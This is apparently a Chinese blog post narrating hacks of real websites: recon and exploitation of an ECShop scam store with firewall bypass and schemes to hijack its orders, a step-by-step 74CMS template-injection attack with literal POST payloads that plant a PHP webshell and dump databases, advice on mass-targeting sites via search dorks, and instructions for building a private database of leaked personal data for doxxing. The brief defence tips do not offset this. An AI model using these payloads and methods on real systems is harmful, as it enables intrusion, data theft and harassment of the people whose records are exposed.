实战黑客入侵 廉价的隐私

写在前面,图片全部打码,所涉及到的漏洞,均已告知网站管理员。

为了不对别人的业务造成影响,特地延迟发文。

没什么技术含量,三流技术水平就能做到本文的效果。

 

一)被骗的小粉丝

事情的起因很简单,小女粉比较虚荣,买了个高仿手表。

懂行的人都懂,高仿表并不便宜,价格普遍在千元以上。

买回来之后,表不走了,想退货,但卖家只换不退,一来二去,被拉黑了。

哥哥瞅了一眼照片,妹子颜值不错,色迷心窍,遂帮之。

第一步,先收集资料,打开网站任意页面,观察网址,一般能看出对方用了什么程序。

http://xxxx.com/goods-12345.html

作为一个老司机,观察网址的后半部分”goods-12345.html” ,骗子网站应该用的是ecshop这套源码。

新手可以使用在线指纹识别平台,查询目标网站用的程序。

指纹查询:http://whatweb.bugscaner.com/look/

查骗子网站的IP地址和机房信息。

在线查询:ping.chinaz.com

IP地址没变化,说明骗子网站没有使用CDN。

IP地址是香港,大概率没什么防御。

最后一步,收集此IP开放了哪些端口,每个端口都代表着一种服务,开放的端口越多,我们入侵的机会就越多。

随便找个端口扫描软件,输入IP地址,开始扫描,成功得到目标IP的端口。

在浏览器输入IP和端口号,看看有什么反应。

从截图能看出来,对方的服务器是linux系统,安装了宝塔面板

 

目前已知目标网站的程序源码、真实IP地址、机房信息、主机系统、主机安装的软件,可以开搞了。

百度搜索“程序名+漏洞”,收集整理ecshop相关的一切漏洞信息!

ECShop <= 2.x/3.6.x/3.0.x 漏洞复现:http://r3start.net/index.php/2018/09/04/146

ECShop全系列版本远程代码执行高危漏洞分析+实战提权:https://www.freebuf.com/column/185049.html

ECshop 支付宝插件,sql注入漏洞: https://blog.csdn.net/u011721501/article/details/40342797

ECshop 漏洞合集:https://www.seebug.org/appdir/ecshop

2.x/3.6.x/3.0.x  这几个版本,2018年爆出高危漏洞,直接就能拿下网站管理权限。

实战黑客批量入侵 轻松拿下1000个网站》无极领域这篇专门写过,一键获取各类购物网站的数据库,有图有真相。

下图是ecshop的最新漏洞信息。

下图是ecshop官网公布的程序更新记录。

2020.12.1,ecshopV4.1.0爆出个SQL注入漏洞。

2020.12.30,ecshop官方发布了升级补丁。

轻车熟路,十多分钟时间,就拿到了所有想要的信息。

现在,只要知道骗子网站的版本,就能用相应的漏洞进行攻击。

哥哥又使出了目测大法,这个网站实在是太丑了,猜测应该是旧版源码,2.x 或 3.6.x版本。

直接使用查到的漏洞硬上,详细操作方法,上面的链接都有,不再赘述。

如图,宝塔防火墙拦截了攻击代码…

百度搜索“绕过宝塔防火墙”,现成的方案,现学现卖,绕过防火墙,成功获取网站权限。

下载骗子网站的源码,发现有很多老弟入侵这个网站,全部被防火墙拦截了…

打开源码的数据库配置文件,找到若干明文密码。

登陆网站后台,看看订单列表页,居然真的有人买…

还有很多人留言问怎么购买…

这个网站采用,货到付款的形式发货。

黑吃黑的方法有两种:

截单法:监控对方的订单,提前发货,这样便能截单,一单500元以上的利润。

替换法:许多网站会留微信二维码,让客户加微信咨询,只需换成自己的二维码,就能截取对方的客户。

事了拂衣去,深藏功与名。

 

二)招聘网信息泄露

骑士CMS是一套招聘网站源码,国内很多招聘网站都在用。

最近这套程序爆出漏洞,哥哥第一时间测试,现场极其惨烈。

漏洞分析:https://xz.aliyun.com/t/8520

大神的漏洞分析非常完整,但手段不够犀利,其实有更简单,更小白的入侵方式,3秒搞定一个网站。

既然已经知道这套源码有漏洞,那么只要找出使用这套源码的招聘网站,就能批量入侵。

搜索神器fofa:https://fofa.so/

常规搜索引擎,用来搜索网页内容。

fofa搜索引擎,可以从代码层面搜索,能搜出所有使用特定代码的网站,可惜是收费的,偶尔用一次,划不来开会员。

作为一个老司机,不想花钱,就得动脑子。

先打开骑士CMS的官网,找到其演示网站,分析页面特征。

发现有个“HR工具箱”的页面,平时在其他网站很少见到,应该算是一个特征。

复制其中一段比较有代表性的文字,直接百度搜索,果然找到很多招聘网站。

连续尝试多次,全部失败…  哥哥一脸懵逼,哪里做错了?

后来发现,原来另一套招聘源码“PHPyun”也有这个页面,估计同行互相模仿…

看来得换个特征,许多网址URL有各自的特点,点击演示网站的各个页面,找比较有代表性的URL。

接下来,使用搜索指令“inurl:XXXX”,查找相同URL的网站,如下图。

这次找对了,这些网站全部是骑士CMS的源码。

打开火狐浏览器,安装插件“hackbar”。

1.打开目标网站。

2.按F12进入调试模式,点击”hackbar”插件。

3.点击“Load URL”加载要攻击的网址。

4.手动给加载的网址末尾,加入代码:index.php?m=home&a=assign_resume_tpl

如:http:www.xxx.com/index.php?m=home&a=assign_resume_tpl

5.勾选“post data”选项,在出现的方框中输入攻击代码,下面两行,任意一个都行。

variable=1&tpl=<?php phpinfo();die();?>

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名=”info” 企业id=”$_GET[‘id’]”/>

6. 点击“Execute”,发送攻击指令,如果出现上图的“页面错误”,证明存在漏洞。

7. 将上一步“Post data”中的代码,换成“variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log”,如果出现如下页面,那么此网站必然有漏洞。

variable=1&tpl=./data/Runtime/Logs/Home/21_01_01.log

代码中“21_01_01”代表攻击当天的时间。

如果是2021年1月6日,那么攻击时就要改成。

variable=1&tpl=./data/Runtime/Logs/Home/21_01_06.log

通过上面的步骤,我们仅仅只是验证网站存在漏洞,接下来要开始获取网站管理权限。

具体细节参考上面的第5步,换个攻击代码即可。

在方框中输入下面的攻击代码,点击“Execute”,发送攻击指令。

variable=1&tpl=<?php fputs(fopen(“sys.php”,”w”),”<?php eval(\$_POST[5521]);?>”)?>; ob_flush();?>

这个攻击指令的意思是,在网站目录创建一个名为“sys.php”文件,文件内容是一段木马“<?php eval(\$_POST[5521]);?>”,木马的密码是5521。

最后,直接使用第7步的代码,就能完成攻击。

variable=1&tpl=./data/Runtime/Logs/Home/21_01_02.log

使用“中国蚁剑”,就能进入网站内部。

中国蚁剑:https://github.com/AntSwordProject/AntSword-Loader

添加木马地址:www.xxxx.com/sys.php 密码:5521

成功获取多个招聘网站的权限,想进入网站数据库,先要找到数据库密码。

百度搜索“骑士CMS 数据库文件”,知道了文件目录,然后在招聘网源码 找出数据库文件。

这个文件里面有数据库用户名和密码,我们用得到的密码连接数据库…

如下,是数据库管理页面,可以随便查管理员/用户的所有信息,图中是管理员的密码字段,可以一键导出所有数据。

整个过程可以实现完全自动化,批量入侵,参考无极领域之前的文章。

给管理员发个邮件,通知对方网站存在漏洞。

 

三)灰色产业链

各类数据遍地都是,主要用途是营销和诈骗。

你能想到的,跨越地区年龄,任何数据,都有人在暗网出售。

全国上亿车主的信息。

400万带身份证 姓名 性别 地址 的信息。

全国知名大型招聘网站都被黑客搞过,数亿份包含所有信息的简历全部泄露。

主流大型网站,数亿份包含密码的数据,全部泄露。

这一切,花点钱就能买到。

除了营销外,这些数据还有个最大的功能:社工!

简而言之,除非对方不上网,否则可以查到任何人的个人信息。

微博的喷子很多,顺手就能查到对方的手机号…

Q群内也经常有人撕逼,顺手就能查到对方的曾经用过的密码、注册过哪些网站…

很多平台都提供收费查询,效果如下:

查询毕竟要花钱,一些人会选择自建社工库,这样就能无限随便查任何人。

一个普通配置的电脑,配个大点的硬盘,将各种数据库全部下载到硬盘。

安装一款全文搜索软件即可,可选的软件很多 AnyTXT 、BBdoc、filelocator、DocFetcher…

一键批量搜索硬盘的所有文件,可以穿透文档,直接搜索文档内部的文字,支持搜索TXT、Word、Excel、PPT、PDF、HTML、Python…. 各种文件格式。

如此简单,毫无技术含量。

 

四)防御

网站尽量用大服务商的主机,阿里云是真的厉害,能拦截大多数攻击。

安全狗、D盾、宝塔 都提供免费的防火墙,效果很好。

个人隐私泄露,这个是不可逆的,改掉你现在用的所有密码,采用密码分级制度,支付、社交、临时… 根据重要程度,分别用不同的密码。

为了防止被社工,可以发布一些假个人信息。

以上,能阻止大多数攻击,普通个人做到这一步,就足够了。

对大神来说,一切防御都是笑话。

— 完 —

删了很多图片 和 细节,以及敏感内容,确保能顺利发布。

网络不是法外之地,谨言慎行,尤其是喷子,很多时候别人只是懒得搭理,千万别以为没人给你治病。

公众号:无极领域

转载请保留出处:无极领域 » 实战黑客入侵 廉价的隐私

赞 (118)